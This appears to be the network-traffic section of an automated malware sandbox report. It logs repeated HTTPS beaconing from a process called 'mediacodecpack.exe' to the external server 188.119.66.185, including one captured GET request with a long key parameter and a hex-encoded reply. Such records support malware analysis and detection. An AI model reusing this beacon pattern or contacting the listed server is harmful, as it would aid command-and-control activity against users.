                                                                                          Dec 18, 2024 21:09:26.182195902 CET44349742188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:27.664869070 CET44349742188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:27.664969921 CET49742443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:27.670181990 CET49742443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:27.670187950 CET44349742188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:27.670211077 CET49742443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:27.670216084 CET44349742188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:28.352890015 CET44349742188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:28.352968931 CET44349742188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:28.354301929 CET49742443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:28.354301929 CET49742443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:28.462830067 CET49748443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:28.462892056 CET44349748188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:28.463056087 CET49748443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:28.463479996 CET49748443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:28.463502884 CET44349748188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:28.663335085 CET49742443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:28.663356066 CET44349742188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:29.947973013 CET44349748188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:29.948095083 CET49748443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:29.948611021 CET49748443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:29.948617935 CET44349748188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:09:29.948853016 CET49748443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:09:29.948858976 CET44349748188.119.66.185192.168.2.8
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 18, 2024 21:09:30.664232016 CET  443          49748      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:30.664340973 CET  49748        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:30.664359093 CET  443          49748      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:30.664381027 CET  443          49748      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:30.664406061 CET  49748        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:30.664505959 CET  49748        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:30.664647102 CET  49748        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:30.664664030 CET  443          49748      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:30.774924040 CET  49753        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:30.774972916 CET  443          49753      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:30.775070906 CET  49753        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:30.775324106 CET  49753        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:30.775338888 CET  443          49753      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:32.225655079 CET  443          49753      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:32.225728035 CET  49753        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:32.235732079 CET  49753        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:32.235748053 CET  443          49753      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:32.235925913 CET  49753        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:32.235930920 CET  443          49753      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:32.911122084 CET  443          49753      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:32.911204100 CET  443          49753      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:32.911365986 CET  49753        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:32.911703110 CET  49753        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:32.911726952 CET  443          49753      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:33.025196075 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:33.025230885 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:33.025337934 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:33.025809050 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:33.025820971 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:34.495987892 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:34.496093035 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:34.496666908 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:34.496678114 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:34.496820927 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:34.496824980 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:35.212383986 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:35.212459087 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:35.212493896 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:35.212534904 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:35.212589025 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:35.212636948 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:35.213627100 CET  49759        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:35.213644028 CET  443          49759      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:35.323303938 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:35.323349953 CET  443          49765      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:35.323410988 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:35.323931932 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:35.323945045 CET  443          49765      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:36.804377079 CET  443          49765      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:36.805990934 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:36.806672096 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:36.806683064 CET  443          49765      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:36.807084084 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:36.807102919 CET  443          49765      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:37.512156963 CET  443          49765      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:37.512229919 CET  443          49765      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:37.512342930 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:37.512342930 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:37.512592077 CET  49765        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:37.512605906 CET  443          49765      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:37.634002924 CET  49771        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:37.634108067 CET  443          49771      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:37.634196043 CET  49771        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:37.634476900 CET  49771        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:37.634510040 CET  443          49771      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:39.297672987 CET  443          49771      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:39.297848940 CET  49771        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:39.298259020 CET  49771        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:39.298280001 CET  443          49771      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:39.298433065 CET  49771        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:39.298445940 CET  443          49771      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:40.000832081 CET  443          49771      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:40.000917912 CET  443          49771      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:40.001044035 CET  49771        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:40.006231070 CET  49771        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:40.006253958 CET  443          49771      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:40.119385958 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:40.119424105 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:40.119519949 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:40.119828939 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:40.119844913 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:41.569955111 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:41.570111036 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:41.577124119 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:41.577161074 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:41.580110073 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:41.580125093 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:42.249655962 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:42.249742985 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:42.249790907 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:42.249834061 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:42.249857903 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:42.249886036 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:42.250081062 CET  49778        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:42.250109911 CET  443          49778      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:42.370111942 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:42.370198965 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:42.370292902 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:42.370651007 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:42.370687008 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:43.824218988 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:43.826320887 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:43.826773882 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:43.826781034 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:43.826981068 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:43.826984882 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:44.511982918 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:44.512128115 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:44.512154102 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:44.512185097 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:44.512201071 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:44.512231112 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:44.548357010 CET  49784        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:44.548382998 CET  443          49784      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:44.667336941 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:44.667383909 CET  443          49790      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:44.667625904 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:44.667810917 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:44.667820930 CET  443          49790      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:46.121237040 CET  443          49790      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:46.121370077 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.128264904 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.128271103 CET  443          49790      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:46.128734112 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.128739119 CET  443          49790      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:46.815993071 CET  443          49790      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:46.816072941 CET  443          49790      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:46.816128969 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.816128969 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.816431046 CET  49790        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.816453934 CET  443          49790      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:46.930983067 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.931026936 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:46.931159973 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.931391954 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:46.931405067 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:48.408322096 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:48.410245895 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:48.410526991 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:48.410543919 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:48.410803080 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:48.410809040 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:49.109270096 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:49.109392881 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:49.109406948 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:49.109446049 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:49.109471083 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:49.109554052 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:49.109870911 CET  49796        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:49.109889984 CET  443          49796      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:49.227895021 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:49.227940083 CET  443          49799      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:49.228132010 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:49.228439093 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:49.228462934 CET  443          49799      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:50.869339943 CET  443          49799      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:50.869446039 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:50.869987965 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:50.869997978 CET  443          49799      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:50.870167971 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:50.870174885 CET  443          49799      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:51.559731007 CET  443          49799      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:51.559838057 CET  443          49799      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:51.559864998 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:51.559895992 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:51.560076952 CET  49799        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:51.560101986 CET  443          49799      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:51.680973053 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:51.681015015 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:51.681067944 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:51.681309938 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:51.681325912 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.152863979 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.153008938 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.153543949 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.153561115 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.153747082 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.153754950 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.859205008 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.859299898 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.859309912 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.859357119 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.859416962 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.859462023 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.859576941 CET  49807        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.859587908 CET  443          49807      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.978446007 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.978470087 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:53.978564978 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.978912115 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:53.978920937 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:55.623960018 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:55.624213934 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:55.624628067 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:55.624639034 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:55.624943972 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:55.624948978 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:56.304848909 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:56.304954052 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:56.304982901 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:56.305027962 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:56.305049896 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:56.305099010 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:56.305169106 CET  49814        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:56.305182934 CET  443          49814      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:56.415947914 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:56.415992975 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:56.416089058 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:56.416414976 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:56.416429996 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:57.893220901 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:57.893305063 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:57.893884897 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:57.893898010 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:57.894059896 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:57.894066095 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:58.595477104 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:58.595597982 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:58.595616102 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:58.595659018 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:58.595679045 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:58.595706940 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:58.595997095 CET  49820        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:58.596012115 CET  443          49820      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:58.712182045 CET  49825        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:58.712245941 CET  443          49825      188.119.66.185  192.168.2.8
Dec 18, 2024 21:09:58.712337971 CET  49825        443        192.168.2.8     188.119.66.185
Dec 18, 2024 21:09:58.712657928 CET  49825        443        192.168.2.8     188.119.66.185
                                                                                          Dec 18, 2024 21:09:58.712681055 CET44349825188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:00.351480961 CET44349825188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:00.351530075 CET49825443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:00.362333059 CET49825443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:00.362341881 CET44349825188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:00.362519979 CET49825443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:00.362524986 CET44349825188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:01.039669037 CET44349825188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:01.039741039 CET49825443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:01.039747000 CET44349825188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:01.039792061 CET49825443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:01.040018082 CET49825443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:01.040035963 CET44349825188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:01.149755001 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:01.149816990 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:01.149902105 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:01.150250912 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:01.150263071 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:02.934170961 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:02.934320927 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:02.934870958 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:02.934880972 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:02.936788082 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:02.936794996 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:03.652196884 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:03.652254105 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:03.652271986 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:03.652287960 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:03.652318954 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:03.652337074 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:03.652457952 CET49831443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:03.652475119 CET44349831188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:03.778326988 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:03.778371096 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:03.778462887 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:03.778784990 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:03.778815031 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.249697924 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.249775887 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:05.250423908 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:05.250442982 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.252298117 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:05.252324104 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.953624964 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.953706980 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.953795910 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.102626085 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.102650881 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:06.241050005 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.241080999 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:06.241149902 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.245394945 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.245405912 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:07.733021975 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:07.733129978 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:07.733553886 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:07.733560085 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:07.735692978 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:07.735697985 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:08.478224993 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:08.478300095 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:08.478317022 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:08.478348017 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:08.478358984 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:08.478404999 CET49845443192.168.2.8188.119.66.185
                                                                                          • 188.119.66.185
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 188.119.66.185 | 443 | 2216 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:00 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:01 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:01 UTC | 810 | IN | Data Ascii: 31e8b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c3d41b1fdd313a1bd23292d5d0915749c97034f2d4034b6d166cccf71168bbf756a4efeb52aa7fc1c23ff4f7c7f248128d46993ea537


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49711 | 188.119.66.185 | 443 | 2216 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
